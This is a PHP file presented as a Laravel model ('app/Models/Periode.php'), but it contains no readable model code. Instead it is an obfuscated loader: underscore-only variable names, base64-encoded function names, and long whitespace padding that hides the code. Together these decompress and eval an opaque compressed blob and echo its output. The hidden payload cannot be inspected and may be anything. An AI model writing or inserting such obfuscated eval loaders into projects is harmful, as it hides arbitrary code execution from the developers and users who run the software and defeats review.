<?php 
        $__='printf';$_='Loading app/Models/Periode.php';
        



























































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtWmtvqkgY/t5k/4MfTkJPdtMDWtsQ4wehgkCrFesM8KWBGQXqcDmlXvDX74tYareb3bPZS86ezEPQgXHey/O875gorVaNT4+AvpA/x+nLUugdLo/oC36ef7nL6IIVX+4XzzGMLvIob6nML4qLiwuhd3a00vrpjB/fz3FWydj6B9H/cEdwJLlwsRR7+rAvHG69VcM34Vhq/RYHBwfHjwmBJEikjrk2dNR28TYzNXnplKvretOEXbPerh85VRwcHBwcHBwcHBz/N/CfMzg4ODh+XAiBXyyuLh/pgmR0IfQ4IxwcHBwcHH8L758/UMN87WKJkY4Sue15OHWUrTOUNp6OCrIvLDVFe2+mmIG+kwLM1q5jM2doR1TXYtcZwxgVQUeTPNwVnaEXuR17QxLGiLQzYF538VgMOmZ3ss0lAvZneFdQLOVBooke2g3BXuQm2h7GWqDLO4rRmmq7cdC2WXBTWBR8GENWBCP04uMu+EXE1jXRxWZE2jDGuw1xEAtSm0xTlAe6zcgTxJ2MC/C/NzSFQTyQzzz0nEiEOFekVGr7g/xajQehoSp1bLq2txPtiepyuXgAG/XcliQyrBvDOQ3NURXvjhk3Ymikje14ss0sQ4XPj5Qy6NgMeGCeOlh5CcQOXAXg/36mBLXN45nakT9CayPe1ms18VoNs8McGSFYw54M3ZOCZCz6WF4buhz7CXp2QCs/0Z5JGebHGK9P7TZ/h6m26Otsf/vQzYCLsYu7XWtY25jr2lcXF1eTI08W5FvHLzZ5U2wWPr4LvRStIZ88aF+GpD3eEB3NIcco0JTI66Cp55h5xac1NCUf71aeYwBPUBOO2bUesrDR5ZjbYpu9cQAxHmypA9nQxlsyml5NUppTPczMTsNvas3En0HvotJhnmgdS6XbV79Om61uVWVPsZgFwLeL2ZLoWkqRvHVxHvnlKpyiuxB0hbrZ1XMzkgMvKWgrkSHE+Rt7ZrlqtKh5MRkdoTKIB6uq3ki6ermHOvBS+2vQZut5B8VWk8s2NKEPoEeKSiuvM08hvoTiLtQW24CNzNTzjY8vc2N05P3kPM6BfXl9GtdtUsUFtvci2Buk7/Ppfoz/pCaWs9drRf7DGhuNnwLgHdW2VddhEWGNDlmj5RsP+SRWVIpZAXtG+Xv1aOpmtMBaWfXMvAN1dZNd0TYTfTVMoZZK8Lvyaj32Ht5VvTNzHXKiP1r6eFpAbFIwi9ZQY5F/0JZKr71gzRRlXio1/5ocH+KO/1Tjl/uUZnCPwdwe9IK+uau4La2m/z/0VLVHlQuox0BHCT1o1X2g2Mhe8zzVBva2rusY/6r+Rx/rhksk555K8slpn43E5no5zaEG+n2hd3b233/x9A/v58erz72/svxk7bcs/PTm8FyoXoVfGrf8ubrv87m699qdvyuWWrrPvV8B5v1jFw==';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      


























































































































































































                                                                                                                                                                                                                     $________;
